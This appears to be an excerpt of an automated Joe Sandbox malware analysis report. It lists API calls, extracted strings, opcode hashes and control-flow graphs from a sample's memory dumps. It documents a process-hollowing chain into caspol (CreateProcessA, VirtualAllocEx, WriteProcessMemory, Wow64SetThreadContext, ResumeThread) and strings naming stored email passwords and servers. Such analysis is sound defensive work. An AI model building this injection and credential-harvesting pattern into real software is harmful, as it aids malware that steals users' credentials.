                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                                      • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                                                      • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                                      • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                                                                      APIs
                                                                      • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                      • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                      • String ID:
                                                                      • API String ID: 1312198159-0
                                                                      • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                      • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                      • API String ID: 0-2111798378
                                                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wmemset$ErrorLast
                                                                      • String ID: IDA$IDA
                                                                      • API String ID: 887189805-2020647798
                                                                      • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                      • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                                      APIs
                                                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: freeaddrinfogetaddrinfosocket
                                                                      • String ID:
                                                                      • API String ID: 2479546573-0
                                                                      • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                      • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000003.505249863.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_3_30b0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction Fuzzy Hash:
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000003.505249863.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_3_30b0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction Fuzzy Hash:
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000003.505249863.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_3_30b0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction Fuzzy Hash:
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000003.505249863.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_3_30b0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction Fuzzy Hash:

                                                                      Execution Graph

                                                                      Execution Coverage:14.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:129
                                                                      Total number of Limit Nodes:13
                                                                      execution_graph 10287 37e9fe 10290 37e7fc 10287->10290 10288 37e918 10290->10288 10291 730938 10290->10291 10292 730952 10291->10292 10307 730ce4 10292->10307 10312 731204 10292->10312 10317 730e47 10292->10317 10322 730f82 10292->10322 10334 730d3c 10292->10334 10341 730ebe 10292->10341 10346 730e9a 10292->10346 10358 7313db 10292->10358 10363 730d14 10292->10363 10368 731113 10292->10368 10380 730f33 10292->10380 10384 730fc8 10292->10384 10398 731184 10292->10398 10293 73095a 10293->10290 10308 730ce7 10307->10308 10403 37e2c5 10308->10403 10407 37e2d0 10308->10407 10313 731221 10312->10313 10411 37df31 10313->10411 10415 37df38 10313->10415 10314 7317c2 10318 730e4d 10317->10318 10319 730e7b 10318->10319 10320 37e2c5 CreateProcessA 10318->10320 10321 37e2d0 CreateProcessA 10318->10321 10319->10319 10320->10319 10321->10319 10324 730ea6 10322->10324 10323 730eb8 10325 731077 10323->10325 10427 37d8a8 10323->10427 10431 37d8a1 10323->10431 10324->10323 10326 7314e4 10324->10326 10419 37e090 10324->10419 10423 37e098 10324->10423 10327 73155f 10325->10327 10435 37d7b1 10325->10435 10439 37d7b8 10325->10439 10326->10293 10327->10293 10335 730d34 10334->10335 10336 730d20 10334->10336 10335->10293 10338 730df9 10336->10338 10339 37e2c5 CreateProcessA 10336->10339 10340 37e2d0 CreateProcessA 10336->10340 10337 730e7b 10337->10337 10338->10293 10339->10337 10340->10337 10342 730ec7 10341->10342 10443 37de10 10342->10443 10447 37de0c 10342->10447 10343 731843 10347 730ea6 10346->10347 10348 730eb8 10347->10348 10350 7314e4 10347->10350 10356 37e090 ReadProcessMemory 10347->10356 10357 37e098 ReadProcessMemory 10347->10357 10349 731077 10348->10349 10354 37d8a1 Wow64SetThreadContext 10348->10354 10355 37d8a8 Wow64SetThreadContext 10348->10355 10351 73155f 10349->10351 10352 37d7b1 ResumeThread 10349->10352 10353 37d7b8 ResumeThread 10349->10353 10350->10293 10351->10293 10352->10349 10353->10349 10354->10348 10355->10348 10356->10347 10357->10347 10359 7313f5 10358->10359 10361 37de10 VirtualAllocEx 10359->10361 10362 37de0c VirtualAllocEx 10359->10362 10360 731843 10361->10360 10362->10360 10364 730d1a 10363->10364 10366 37e2c5 CreateProcessA 10364->10366 10367 37e2d0 CreateProcessA 10364->10367 10365 730e7b 10365->10365 10366->10365 10367->10365 10369 730ea6 10368->10369 10369->10368 10370 7314e4 10369->10370 10371 730eb8 10369->10371 10376 37e090 ReadProcessMemory 10369->10376 10377 37e098 ReadProcessMemory 10369->10377 10370->10293 10372 731077 10371->10372 10378 37d8a1 Wow64SetThreadContext 10371->10378 10379 37d8a8 Wow64SetThreadContext 10371->10379 10373 73155f 10372->10373 10374 37d7b1 ResumeThread 10372->10374 10375 37d7b8 ResumeThread 10372->10375 10373->10293 10374->10372 10375->10372 10376->10369 10377->10369 10378->10371 10379->10371 10382 37df31 WriteProcessMemory 10380->10382 10383 37df38 WriteProcessMemory 10380->10383 10381 730f63 10381->10293 10382->10381 10383->10381 10390 37df31 WriteProcessMemory 10384->10390 10391 37df38 WriteProcessMemory 10384->10391 10385 731077 10389 73155f 10385->10389 10392 37d7b1 ResumeThread 10385->10392 10393 37d7b8 ResumeThread 10385->10393 10386 730ea6 10387 730eb8 10386->10387 10388 731033 10386->10388 10396 37e090 ReadProcessMemory 10386->10396 10397 37e098 ReadProcessMemory 10386->10397 10387->10385 10394 37d8a1 Wow64SetThreadContext 10387->10394 10395 37d8a8 Wow64SetThreadContext 10387->10395 10388->10293 10389->10293 10390->10386 10391->10386 10392->10385 10393->10385 10394->10387 10395->10387 10396->10386 10397->10386 10399 731077 10398->10399 10400 73155f 10399->10400 10401 37d7b1 ResumeThread 10399->10401 10402 37d7b8 ResumeThread 10399->10402 10400->10293 10401->10399 10402->10399 10404 37e357 CreateProcessA 10403->10404 10406 37e5b5 10404->10406 10408 37e357 CreateProcessA 10407->10408 10410 37e5b5 10408->10410 10412 37df84 WriteProcessMemory 10411->10412 10414 37e023 10412->10414 10414->10314 10416 37df84 WriteProcessMemory 10415->10416 10418 37e023 10416->10418 10418->10314 10420 37e0e4 ReadProcessMemory 10419->10420 10422 37e162 10420->10422 10422->10324 10424 37e0e4 ReadProcessMemory 10423->10424 10426 37e162 10424->10426 10426->10324 10428 37d8f1 Wow64SetThreadContext 10427->10428 10430 37d96f 10428->10430 10430->10323 10432 37d8f1 Wow64SetThreadContext 10431->10432 10434 37d96f 10432->10434 10434->10323 10436 37d7b8 ResumeThread 10435->10436 10438 37d84e 10436->10438 10438->10325 10440 37d7fc ResumeThread 10439->10440 10442 37d84e 10440->10442 10442->10325 10444 37de54 VirtualAllocEx 10443->10444 10446 37ded2 10444->10446 10446->10343 10448 37de54 VirtualAllocEx 10447->10448 10450 37ded2 10448->10450 10450->10343 10451 37ebcc 10452 37e7fc 10451->10452 10453 37e918 10452->10453 10454 730938 12 API calls 10452->10454 10454->10452

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 446 37e2c5-37e369 448 37e3b2-37e3da 446->448 449 37e36b-37e382 446->449 452 37e420-37e476 448->452 453 37e3dc-37e3f0 448->453 449->448 454 37e384-37e389 449->454 462 37e4bc-37e5b3 CreateProcessA 452->462 463 37e478-37e48c 452->463 453->452 464 37e3f2-37e3f7 453->464 455 37e3ac-37e3af 454->455 456 37e38b-37e395 454->456 455->448 457 37e397 456->457 458 37e399-37e3a8 456->458 457->458 458->458 461 37e3aa 458->461 461->455 482 37e5b5-37e5bb 462->482 483 37e5bc-37e6a1 462->483 463->462 471 37e48e-37e493 463->471 465 37e41a-37e41d 464->465 466 37e3f9-37e403 464->466 465->452 468 37e407-37e416 466->468 469 37e405 466->469 468->468 472 37e418 468->472 469->468 474 37e4b6-37e4b9 471->474 475 37e495-37e49f 471->475 472->465 474->462 476 37e4a3-37e4b2 475->476 477 37e4a1 475->477 476->476 479 37e4b4 476->479 477->476 479->474 482->483 495 37e6a3-37e6a7 483->495 496 37e6b1-37e6b5 483->496 495->496 497 37e6a9 495->497 498 37e6b7-37e6bb 496->498 499 37e6c5-37e6c9 496->499 497->496 498->499 500 37e6bd 498->500 501 37e6cb-37e6cf 499->501 502 37e6d9-37e6dd 499->502 500->499 501->502 503 37e6d1 501->503 504 37e713-37e71e 502->504 505 37e6df-37e708 502->505 503->502 508 37e71f 504->508 505->504 508->508
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gN$gN$gN
                                                                      • API String ID: 963392458-2543736959
                                                                      • Opcode ID: 7340ad8349140dca72ee077835dbc1cd1a86f1b5c6dfe12e5f48d50428e587bd
                                                                      • Instruction ID: 1fce7c5e78c38c766875fbe3c099de25f3e2a5aafe4a46a0d83c6f6ed4a10088
                                                                      • Opcode Fuzzy Hash: 7340ad8349140dca72ee077835dbc1cd1a86f1b5c6dfe12e5f48d50428e587bd
                                                                      • Instruction Fuzzy Hash: 27C14770D002598FDF25CFA8C845BEEBBB1BF09304F0091AAD819B7254DB789A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 510 37e2d0-37e369 512 37e3b2-37e3da 510->512 513 37e36b-37e382 510->513 516 37e420-37e476 512->516 517 37e3dc-37e3f0 512->517 513->512 518 37e384-37e389 513->518 526 37e4bc-37e5b3 CreateProcessA 516->526 527 37e478-37e48c 516->527 517->516 528 37e3f2-37e3f7 517->528 519 37e3ac-37e3af 518->519 520 37e38b-37e395 518->520 519->512 521 37e397 520->521 522 37e399-37e3a8 520->522 521->522 522->522 525 37e3aa 522->525 525->519 546 37e5b5-37e5bb 526->546 547 37e5bc-37e6a1 526->547 527->526 535 37e48e-37e493 527->535 529 37e41a-37e41d 528->529 530 37e3f9-37e403 528->530 529->516 532 37e407-37e416 530->532 533 37e405 530->533 532->532 536 37e418 532->536 533->532 538 37e4b6-37e4b9 535->538 539 37e495-37e49f 535->539 536->529 538->526 540 37e4a3-37e4b2 539->540 541 37e4a1 539->541 540->540 543 37e4b4 540->543 541->540 543->538 546->547 559 37e6a3-37e6a7 547->559 560 37e6b1-37e6b5 547->560 559->560 561 37e6a9 559->561 562 37e6b7-37e6bb 560->562 563 37e6c5-37e6c9 560->563 561->560 562->563 564 37e6bd 562->564 565 37e6cb-37e6cf 563->565 566 37e6d9-37e6dd 563->566 564->563 565->566 567 37e6d1 565->567 568 37e713-37e71e 566->568 569 37e6df-37e708 566->569 567->566 572 37e71f 568->572 569->568 572->572
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gN$gN$gN
                                                                      • API String ID: 963392458-2543736959
                                                                      • Opcode ID: 19a27bbef4a6516bb4b9b61fdc371914c98bc3673b864dd395d3aba39e73a763
                                                                      • Instruction ID: a43b1304ed6d9703e6fe1e062888ccd8ac10c07ec38ae44378ba0e8a8434435b
                                                                      • Opcode Fuzzy Hash: 19a27bbef4a6516bb4b9b61fdc371914c98bc3673b864dd395d3aba39e73a763
                                                                      • Instruction Fuzzy Hash: 9FC13670D002198FDF25CFA8C845BEEBBB1BF09304F0091AAD819B7250DB789A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 822 37df31-37dfa3 824 37dfa5-37dfb7 822->824 825 37dfba-37e021 WriteProcessMemory 822->825 824->825 827 37e023-37e029 825->827 828 37e02a-37e07c 825->828 827->828
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 5df8f024a19a4cc1f66095f5ef32dee981a0092e12224152709b6abd5298b06a
                                                                      • Instruction ID: bd5215d548fd8327cf45d0287e13c7ffc7f17ca7364767920e4ce3ab684fc9ca
                                                                      • Opcode Fuzzy Hash: 5df8f024a19a4cc1f66095f5ef32dee981a0092e12224152709b6abd5298b06a
                                                                      • Instruction Fuzzy Hash: 8841BDB4D012489FCF10CFA9D984AEEFBF1BB49314F20902AE814B7210D379AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 833 37df38-37dfa3 835 37dfa5-37dfb7 833->835 836 37dfba-37e021 WriteProcessMemory 833->836 835->836 838 37e023-37e029 836->838 839 37e02a-37e07c 836->839 838->839
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: c45f0c73637aea90f294451dfede54661fecdb7ca4d6e1a7cf351051d75c777c
                                                                      • Instruction ID: 0e248cf0d9a0b7ce6b2c4698792f77e334393f423fd9fe16544d9b645453c2d9
                                                                      • Opcode Fuzzy Hash: c45f0c73637aea90f294451dfede54661fecdb7ca4d6e1a7cf351051d75c777c
                                                                      • Instruction Fuzzy Hash: EA41ADB4D012589FCF10CFA9D984AEEFBF1BB49314F20902AE815B7210D375AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 844 37e090-37e160 ReadProcessMemory 847 37e162-37e168 844->847 848 37e169-37e1bb 844->848 847->848
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: f770f2b7ca2bc3529e1d6e1dedd8928cf06dc418e857256e7e7fe1fd56fe8f53
                                                                      • Instruction ID: 4df0fda947ae09c64e6dbef7794f83acff34be1c165b42dfd35fecd5a4053d59
                                                                      • Opcode Fuzzy Hash: f770f2b7ca2bc3529e1d6e1dedd8928cf06dc418e857256e7e7fe1fd56fe8f53
                                                                      • Instruction Fuzzy Hash: DB41CBB8D042589FCF10CFA9D984AEEFBB1BF49310F24906AE815B7210C378A945CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 853 37e098-37e160 ReadProcessMemory 856 37e162-37e168 853->856 857 37e169-37e1bb 853->857 856->857
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 94d462935bd0d36c6a6f9ddbf07140bf3782914eea61e311cf4c99dea2fb4834
                                                                      • Instruction ID: 9ea3bd2ed21f33ee96cb3b05477d900e260afcf67cc6dfaeb926d9cd1a563e7e
                                                                      • Opcode Fuzzy Hash: 94d462935bd0d36c6a6f9ddbf07140bf3782914eea61e311cf4c99dea2fb4834
                                                                      • Instruction Fuzzy Hash: 4041AAB9D002589FCF10CFA9D984AEEFBB1BF49314F14942AE815B7210D735A945CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 862 37de0c-37ded0 VirtualAllocEx 865 37ded2-37ded8 862->865 866 37ded9-37df23 862->866 865->866
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 1590a7e1511dd2f78fbb1e38cd364384efc9a248a2a400a967009652c6078f8e
                                                                      • Instruction ID: b540b688a65872850037fbd7cfe2a611ce13a07a4b1c217b3e4aee326c3a91a9
                                                                      • Opcode Fuzzy Hash: 1590a7e1511dd2f78fbb1e38cd364384efc9a248a2a400a967009652c6078f8e
                                                                      • Instruction Fuzzy Hash: CB41A8B8D002589FCF10CFA9D984AEEFBB1AF49314F20942AE815BB214D735A945CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 871 37de10-37ded0 VirtualAllocEx 874 37ded2-37ded8 871->874 875 37ded9-37df23 871->875 874->875
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 5c5d0958e7d76efb7bd86933dc7ff8780a9ae96ec6b28c82210f24c1efa4febf
                                                                      • Instruction ID: 9209c07ca428be955e63aa14cd751960206533992f53dd17643b16306aefb7c5
                                                                      • Opcode Fuzzy Hash: 5c5d0958e7d76efb7bd86933dc7ff8780a9ae96ec6b28c82210f24c1efa4febf
                                                                      • Instruction Fuzzy Hash: D9419AB8D002589BCF10CFA9D984AAEFBB1BF49314F10941AE815B7314D735A945CF55

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 880 37d8a1-37d908 882 37d91f-37d96d Wow64SetThreadContext 880->882 883 37d90a-37d91c 880->883 885 37d976-37d9c2 882->885 886 37d96f-37d975 882->886 883->882 886->885
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0037D957
